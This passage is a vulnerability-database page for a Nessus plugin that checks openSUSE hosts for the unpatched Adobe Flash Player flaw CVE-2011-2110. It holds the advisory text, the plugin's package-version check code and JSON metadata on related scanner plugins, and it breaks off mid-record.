Search...

openSUSE Security Update : flash-player (openSUSE-SU-2011:0637-1)

2014-06-13T00:00:00

ID SUSE_11_3_FLASH-PLAYER-110614.NASL
Type nessus
Reporter This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2021-01-14T00:00:00

Description

A critical vulnerability has been identified in Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.3.185.23 and earlier versions for Android. This memory corruption vulnerability (CVE-2011-2110) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in targeted attacks via malicious Web pages.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update flash-player-4716.
#
# The text description of this plugin is (C) SUSE LLC.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(75500);
  script_version("1.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");

  script_cve_id("CVE-2011-2110");

  script_name(english:"openSUSE Security Update : flash-player (openSUSE-SU-2011:0637-1)");
  script_summary(english:"Check for the flash-player-4716 patch");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote openSUSE host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"A critical vulnerability has been identified in Adobe Flash Player
10.3.181.23 and earlier versions for Windows, Macintosh, Linux and
Solaris, and Adobe Flash Player 10.3.185.23 and earlier versions for
Android. This memory corruption vulnerability (CVE-2011-2110) could
cause a crash and potentially allow an attacker to take control of the
affected system. There are reports that this vulnerability is being
exploited in the wild in targeted attacks via malicious Web pages."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=699942"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://lists.opensuse.org/opensuse-updates/2011-06/msg00027.html"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Update the affected flash-player package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:flash-player");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:11.3");

  script_set_attribute(attribute:"patch_publication_date", value:"2011/06/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/13");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE11\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "11.3", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686)$") audit(AUDIT_ARCH_NOT, "i586 / i686", ourarch);

flag = 0;

if ( rpm_check(release:"SUSE11.3", reference:"flash-player-10.3.181.26-0.2.1") ) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "flash-player");
}

JSON Vulners Source

Initial Source

{"id": "SUSE_11_3_FLASH-PLAYER-110614.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2011:0637-1)", "description": "A critical vulnerability has been identified in Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.3.185.23 and earlier versions for Android. This memory corruption vulnerability (CVE-2011-2110) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in targeted attacks via malicious Web pages.", "published": "2014-06-13T00:00:00", "modified": "2021-01-14T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/75500", "reporter": "This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=699942", "https://lists.opensuse.org/opensuse-updates/2011-06/msg00027.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2110"], "cvelist": ["CVE-2011-2110"], "immutableFields": [], "lastseen": "2022-04-16T14:07:08", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "canvas", "idList": ["FLASH_APSB11_18"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2011-319", "CPAI-2013-3488"]}, {"type": "cve", "idList": ["CVE-2011-2110"]}, {"type": "exploitdb", "idList": ["EDB-ID:19295"]}, {"type": "freebsd", "idList": ["55A528E8-9787-11E0-B24A-001B2134EF46"]}, {"type": "gentoo", "idList": ["GLSA-201110-11"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_ARRAYINDEXING", "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_ARRAYINDEXING/"]}, {"type": "nessus", "idList": ["5967.PRM", "FLASH_PLAYER_APSB11-18.NASL", "FREEBSD_PKG_55A528E8978711E0B24A001B2134EF46.NASL", "GENTOO_GLSA-201110-11.NASL", "MACOSX_FLASH_PLAYER_10_3_181_26.NASL", "REDHAT-RHSA-2011-0869.NASL", "SUSE_11_4_FLASH-PLAYER-110614.NASL", "SUSE_11_FLASH-PLAYER-110615.NASL", "SUSE_FLASH-PLAYER-7571.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231069749", "OPENVAS:136141256231070774", "OPENVAS:69749", "OPENVAS:70774"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:113921"]}, {"type": "redhat", "idList": ["RHSA-2011:0869"]}, {"type": "saint", "idList": ["SAINT:2005E41D7FC86035CB526B0FFF88EBD8", "SAINT:57B4EC82A14E733E11A2680CDCAD2453", "SAINT:A3C27232437E936F9753EC983855C738", "SAINT:F38F79D5210BA3E70E0A383BD0788B49"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11742"]}, {"type": "seebug", "idList": ["SSV:20643", "SSV:73235"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2011:0637-1", "SUSE-SU-2011:0640-1"]}, {"type": "threatpost", "idList": ["THREATPOST:5BBDD82E1BCCA9D8615FD3FBFD37A188", "THREATPOST:66AAE48AA5E53AA0EB4A9179456F65FC", "THREATPOST:B55EB8317F225C33315C24F0621A69F2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-2110"]}]}, "score": {"value": 9.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["FLASH_APSB11_18"]}, {"type": "cve", "idList": ["CVE-2011-2110"]}, {"type": "exploitdb", "idList": ["EDB-ID:19295"]}, {"type": "freebsd", "idList": ["55A528E8-9787-11E0-B24A-001B2134EF46"]}, {"type": "gentoo", "idList": ["GLSA-201110-11"]}, {"type": "nessus", "idList": ["FLASH_PLAYER_APSB11-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107444"]}, {"type": "saint", "idList": ["SAINT:57B4EC82A14E733E11A2680CDCAD2453"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11742"]}, {"type": "seebug", "idList": ["SSV:73235"]}, {"type": "suse", "idList": ["SUSE-SU-2011:0640-1"]}, {"type": "threatpost", "idList": ["THREATPOST:5BBDD82E1BCCA9D8615FD3FBFD37A188"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-2110"]}]}, "exploitation": null, "vulnersScore": 9.2}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "75500", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-4716.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75500);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2110\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2011:0637-1)\");\n script_summary(english:\"Check for the flash-player-4716 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A critical vulnerability has been identified in Adobe Flash Player\n10.3.181.23 and earlier versions for Windows, Macintosh, Linux and\nSolaris, and Adobe Flash Player 10.3.185.23 and earlier versions for\nAndroid. This memory corruption vulnerability (CVE-2011-2110) could\ncause a crash and potentially allow an attacker to take control of the\naffected system. There are reports that this vulnerability is being\nexploited in the wild in targeted attacks via malicious Web pages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=699942\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-06/msg00027.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"flash-player-10.3.181.26-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:11.3"], "solution": "Update the affected flash-player package.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2011-06-14T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(Adobe Flash Player AVM Verification Logic Array Indexing Code Execution)"]}

{"ubuntucve": [{"lastseen": "2021-11-22T21:56:38", "description": "Adobe Flash Player before 10.3.181.26 on Windows, Mac OS X, Linux, and\nSolaris, and 10.3.185.23 and earlier on Android, allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption) via\nunspecified vectors, as exploited in the wild in June 2011.", "cvss3": {}, "published": "2011-06-16T00:00:00", "type": "ubuntucve", "title": "CVE-2011-2110", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2110"], "modified": "2011-06-16T00:00:00", "id": "UB:CVE-2011-2110", "href": "https://ubuntu.com/security/CVE-2011-2110", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-04-16T14:06:08", "description": "A critical vulnerability has been identified in Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.3.185.23 and earlier versions for Android. This memory corruption vulnerability (CVE-2011-2110) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in targeted attacks via malicious Web pages.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2011:0637-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:flash-player", "cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_FLASH-PLAYER-110614.NASL", "href": "https://www.tenable.com/plugins/nessus/75836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update flash-player-4716.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75836);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2110\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2011:0637-1)\");\n script_summary(english:\"Check for the flash-player-4716 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A critical vulnerability has been identified in Adobe Flash Player\n10.3.181.23 and earlier versions for Windows, Macintosh, Linux and\nSolaris, and Adobe Flash Player 10.3.185.23 and earlier versions for\nAndroid. This memory corruption vulnerability (CVE-2011-2110) could\ncause a crash and potentially allow an attacker to take control of the\naffected system. There are reports that this vulnerability is being\nexploited in the wild in targeted attacks via malicious Web pages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=699942\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-06/msg00027.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"flash-player-10.3.181.26-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-01T15:20:04", "description": "Adobe Product Security Incident Response Team reports :\n\nA critical vulnerability has been identified in Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris, and Adobe Flash Player 10.3.185.23 and earlier versions for Android. This memory corruption vulnerability (CVE-2011-2110) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild in targeted attacks via malicious Web pages.", "cvss3": {"score": null, "vector": null}, "published": "2011-06-16T00:00:00", "type": "nessus", "title": "FreeBSD : linux-flashplugin -- remote code execution vulnerability (55a528e8-9787-11e0-b24a-001b2134ef46)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-flashplugin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_55A528E8978711E0B24A001B2134EF46.NASL", "href": "https://www.tenable.com/plugins/nessus/55158", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55158);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2110\");\n\n script_name(english:\"FreeBSD : linux-flashplugin -- remote code execution vulnerability (55a528e8-9787-11e0-b24a-001b2134ef46)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Product Security Incident Response Team reports :\n\nA critical vulnerability has been identified in Adobe Flash Player\n10.3.181.23 and earlier versions for Windows, Macintosh, Linux and\nSolaris, and Adobe Flash Player 10.3.185.23 and earlier versions for\nAndroid. This memory corruption vulnerability (CVE-2011-2110) could\ncause a crash and potentially allow an attacker to take control of the\naffected system. There are reports that this vulnerability is being\nexploited in the wild in targeted attacks via malicious Web pages.\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb11-18.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb11-18.html\"\n );\n # https://vuxml.freebsd.org/freebsd/55a528e8-9787-11e0-b24a-001b2134ef46.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b276e0b4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player AVM Verification Logic Array Indexing Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplugin<=9.0r289\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<10.3r181.26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-01T15:18:39", "description": "According to its version, the instance of Flash Player installed on the remote Mac OS X host is earlier than 10.3.181.26. This version of Flash Player has a critical vulnerability. By tricking a user on the affected system into opening a specially crafted document with Flash content, an attacker could leverage the vulnerability to execute arbitrary code remotely on the system subject to the user's privileges. \n\nThis issue is reportedly being exploited in the wild in targeted attacks as of June 2011.", "cvss3": {"score": null, "vector": null}, "published": "2011-06-15T00:00:00", "type": "nessus", "title": "Flash Player for Mac < 10.3.181.26 Remote Memory Corruption (APSB11-18)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2110"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_10_3_181_26.NASL", "href": "https://www.tenable.com/plugins/nessus/55141", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(55141);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\"CVE-2011-2110\");\n script_bugtraq_id(48268);\n\n script_name(english:\"Flash Player for Mac < 10.3.181.26 Remote Memory Corruption (APSB11-18)\");\n script_summary(english:\"Checks version of Flash Player from Info.plist\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Mac OS X host has a browser plugin that is affected by a\nremote memory corruption vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its version, the instance of Flash Player installed on\nthe remote Mac OS X host is earlier than 10.3.181.26. This version of\nFlash Player has a critical vulnerability. By tricking a user on the\naffected system into opening a specially crafted document with Flash\ncontent, an attacker could leverage the vulnerability to execute\narbitrary code remotely on the system subject to the user's\nprivileges. \n\nThis issue is reportedly being exploited in the wild in targeted\nattacks as of June 2011.\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www.adobe.com/support/security/bulletins/apsb11-18.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade to Adobe Flash for Mac version 10.3.181.26 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n 